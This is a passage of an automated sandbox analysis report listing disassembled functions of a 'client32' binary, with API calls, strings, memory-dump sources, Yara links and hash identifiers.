                                                                                                                  • Opcode Fuzzy Hash: 591d586ace468c367697f2cfdcd8f3c02fdce152b0cab662d0af8d0068fcdcab
                                                                                                                  • Instruction Fuzzy Hash: 554185B6C00209AFDB50CFB8D945AEFB7BCEB88304F108559E516E7241E7749605CBA1
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BED0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6BED0F2B,4CBAF0D2,00000000,?,?,6BEEF278,000000FF,?,6BEBAE0A,?,00000000,?,00000080), ref: 6BED0D48
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6BED0D5B
                                                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6BEFCB4C,?,?,6BEEF278,000000FF,?,6BEBAE0A,?,00000000,?,00000080), ref: 6BED0D76
                                                                                                                  • _malloc.LIBCMT ref: 6BED0D8C
                                                                                                                    • Part of subcall function 6BED1B69: __FF_MSGBANNER.LIBCMT ref: 6BED1B82
                                                                                                                    • Part of subcall function 6BED1B69: __NMSG_WRITE.LIBCMT ref: 6BED1B89
                                                                                                                    • Part of subcall function 6BED1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BEDD3C1,6BED6E81,00000001,6BED6E81,?,6BEDF447,00000018,6BEF7738,0000000C,6BEDF4D7), ref: 6BED1BAE
                                                                                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6BEEF278,000000FF,?,6BEBAE0A,?,00000000,?), ref: 6BED0D9F
                                                                                                                  • _free.LIBCMT ref: 6BED0D84
                                                                                                                    • Part of subcall function 6BED1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6BED1C13
                                                                                                                    • Part of subcall function 6BED1BFD: GetLastError.KERNEL32(00000000), ref: 6BED1C25
                                                                                                                  • _free.LIBCMT ref: 6BED0DAF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                                  • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                                  • API String ID: 1360380336-1843585929
                                                                                                                  • Opcode ID: 86c502fddac31bcfc057399a623715ecc8710b76d9cd425ce60f64d457f1d860
                                                                                                                  • Instruction ID: eef3d05b35a42cc95b830bf58c1e45e3952d1bcc564c4db35d518cffa8cb235c
                                                                                                                  • Opcode Fuzzy Hash: 86c502fddac31bcfc057399a623715ecc8710b76d9cd425ce60f64d457f1d860
                                                                                                                  • Instruction Fuzzy Hash: C401DFB5200301ABE7308B709C95F5777ACAF80B08F24491DF956CF281EAB9F442C721
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11015220 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 110152DA
                                                                                                                  • _memset.LIBCMT ref: 1101531E
                                                                                                                  • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015358
                                                                                                                  Strings
                                                                                                                  • NSLSP, xrefs: 11015368
                                                                                                                  • PackedCatalogItem, xrefs: 11015342
                                                                                                                  • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101525B
                                                                                                                  • %012d, xrefs: 110152D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue_memsetwsprintf
                                                                                                                  • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                  • API String ID: 1333399081-1346142259
                                                                                                                  • Opcode ID: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
                                                                                                                  • Instruction ID: bdea00c4cadcb984d55cc41d8ffa963856162fa43bf7957b15c91c952cfd9536
                                                                                                                  • Opcode Fuzzy Hash: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
                                                                                                                  • Instruction Fuzzy Hash: 31419071D022299FEB11DB54CC80BEEF7B8EB05318F4441E8E41AA7281EB346B44CF50
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC6940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6950
                                                                                                                    • Part of subcall function 6BEC7BE0: _memset.LIBCMT ref: 6BEC7BFF
                                                                                                                    • Part of subcall function 6BEC7BE0: _strncpy.LIBCMT ref: 6BEC7C0B
                                                                                                                    • Part of subcall function 6BEBA4E0: EnterCriticalSection.KERNEL32(6BEFB898,00000000,?,?,?,6BEBDA7F,?,00000000), ref: 6BEBA503
                                                                                                                    • Part of subcall function 6BEBA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6BEBA568
                                                                                                                    • Part of subcall function 6BEBA4E0: Sleep.KERNEL32(00000000,?,6BEBDA7F,?,00000000), ref: 6BEBA581
                                                                                                                    • Part of subcall function 6BEBA4E0: LeaveCriticalSection.KERNEL32(6BEFB898,00000000), ref: 6BEBA5B3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                  • String ID: 1.2$Blk$Channel$Client$Publish %d pending services
                                                                                                                  • API String ID: 1112461860-3612439952
                                                                                                                  • Opcode ID: 2b79487b3e47a0329fc56a8d8006b5d368937a494f69f7d0e8676d3b804f692a
                                                                                                                  • Instruction ID: 65f5b46d4a2e610a537153b6aceacf047c30b95273e9d775dd2a551a0c7a8c6f
                                                                                                                  • Opcode Fuzzy Hash: 2b79487b3e47a0329fc56a8d8006b5d368937a494f69f7d0e8676d3b804f692a
                                                                                                                  • Instruction Fuzzy Hash: D851A131B042099FDF10CF78EA51BAB77A8AB8630CF304569D86283381DB3DE455CB92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11017550 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(00000308,000000FF), ref: 1101758C
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 11017595
                                                                                                                  • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 110175BC
                                                                                                                  • CoUninitialize.OLE32 ref: 11017620
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                  • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                  • API String ID: 2407233060-578995875
                                                                                                                  • Opcode ID: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
                                                                                                                  • Instruction ID: f5474d2ce38f90e0a7ff94217669a9bd078e6126dc5b2c5f9befb888d677ae11
                                                                                                                  • Opcode Fuzzy Hash: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
                                                                                                                  • Instruction Fuzzy Hash: C1214CB5E006625BDB50CF648C44B6FBBE48F88348F0004B9FC5DDA188FA78D940C792
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • send.WSOCK32(?,?,?,00000000), ref: 6BEB9C93
                                                                                                                  • timeGetTime.WINMM(?,?,?,00000000), ref: 6BEB9CD0
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 6BEB9CDE
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6BEB9D4F
                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 6BEB9D72
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                  • String ID: 3'
                                                                                                                  • API String ID: 77915721-280543908
                                                                                                                  • Opcode ID: 0df89f4622c1feae28fec625842fab3b112143f8e6bbad66e16a7603bcc14c16
                                                                                                                  • Instruction ID: d9fbc713d6f776f447a109d827fee70a99ac7dba1baf06314e76d32c6e87e379
                                                                                                                  • Opcode Fuzzy Hash: 0df89f4622c1feae28fec625842fab3b112143f8e6bbad66e16a7603bcc14c16
                                                                                                                  • Instruction Fuzzy Hash: BF218179A041288FDB20CF64CD89B9AB7B4AF55314F2182D9D90D97382CB38DD95CF91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 110312F0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf
                                                                                                                  • String ID: %s%s%s.bin$494126$_HF$_HW$_SW
                                                                                                                  • API String ID: 2111968516-430959295
                                                                                                                  • Opcode ID: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
                                                                                                                  • Instruction ID: 2d37ec8be248a08c2e3c36772f725827158d619cf10ab6990a6c8ba6e6d701e2
                                                                                                                  • Opcode Fuzzy Hash: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
                                                                                                                  • Instruction Fuzzy Hash: 93E09B60D2060C7FF30065588C057AFBB9C1F4931AF40C0E0FEE997A82E93494404A92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEB8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6BEB5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6BEB5014
                                                                                                                    • Part of subcall function 6BEB5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6BEB8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6BEB5034
                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6BEB8EAE
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6BEB8EBF
                                                                                                                    • Part of subcall function 6BEB2420: _strrchr.LIBCMT ref: 6BEB242E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2631306422.000000006BEB0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637598150.000000006BEF9000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2637734004.000000006BEFE000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2638426034.000000006BF00000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressChangeCloseFileFindFreeLibraryModuleNameNotificationProc_strrchr
                                                                                                                  • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                  • API String ID: 4066820201-3459472706
                                                                                                                  • Opcode ID: a836fa05992079e2aade00061fd7acdd415920f00596d5df5fd9903d66d1531b
                                                                                                                  • Instruction ID: fe5e83426ff630d9449c501ae12b8df4e1f6f54d663ee0ec9b11f9dd381ae211
                                                                                                                  • Opcode Fuzzy Hash: a836fa05992079e2aade00061fd7acdd415920f00596d5df5fd9903d66d1531b
                                                                                                                  • Instruction Fuzzy Hash: 5211CB71B0011A9BEF148BA1ED51FEE7368AF55305F100499EE09E3340EB78D945CB61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 111430E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1114310F
                                                                                                                  • wsprintfA.USER32 ref: 11143146
                                                                                                                    • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
                                                                                                                    • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
                                                                                                                    • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
                                                                                                                    • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                  • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                  • API String ID: 1985783259-2296142801
                                                                                                                  • Opcode ID: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
                                                                                                                  • Instruction ID: f51f52dcbd712469e4e57ed30d3ae6ecd606de78ecfb21ce2ea79b628c9a40ce
                                                                                                                  • Opcode Fuzzy Hash: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
                                                                                                                  • Instruction Fuzzy Hash: 0B1108FAD012396BD710DAA5DD80FEAF37C9B44B18F004165FB09F7141E630AA01C7A5
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11031200 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 110312B6
                                                                                                                    • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
                                                                                                                    • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
                                                                                                                    • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
                                                                                                                    • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                  • String ID: %s%s.bin$494126$clientinv.cpp$m_pDoInv == NULL
                                                                                                                  • API String ID: 4180936305-641825243
                                                                                                                  • Opcode ID: 69f1edf75e8ca04657a2c8ec5fa8d6c870dc7a90b51fd07c843ad0103a623bf6
                                                                                                                  • Instruction ID: 2341575681f6e1d693b2af78dd19dca744ecd147650d17c5e1ce5a0d9c930bd8
                                                                                                                  • Opcode Fuzzy Hash: 69f1edf75e8ca04657a2c8ec5fa8d6c870dc7a90b51fd07c843ad0103a623bf6
                                                                                                                  • Instruction Fuzzy Hash: 78218EB5E00705AFD710DF65DC80BABB7E4EB89718F10856EF825D7681EA34A8108B55
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 1113F5D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
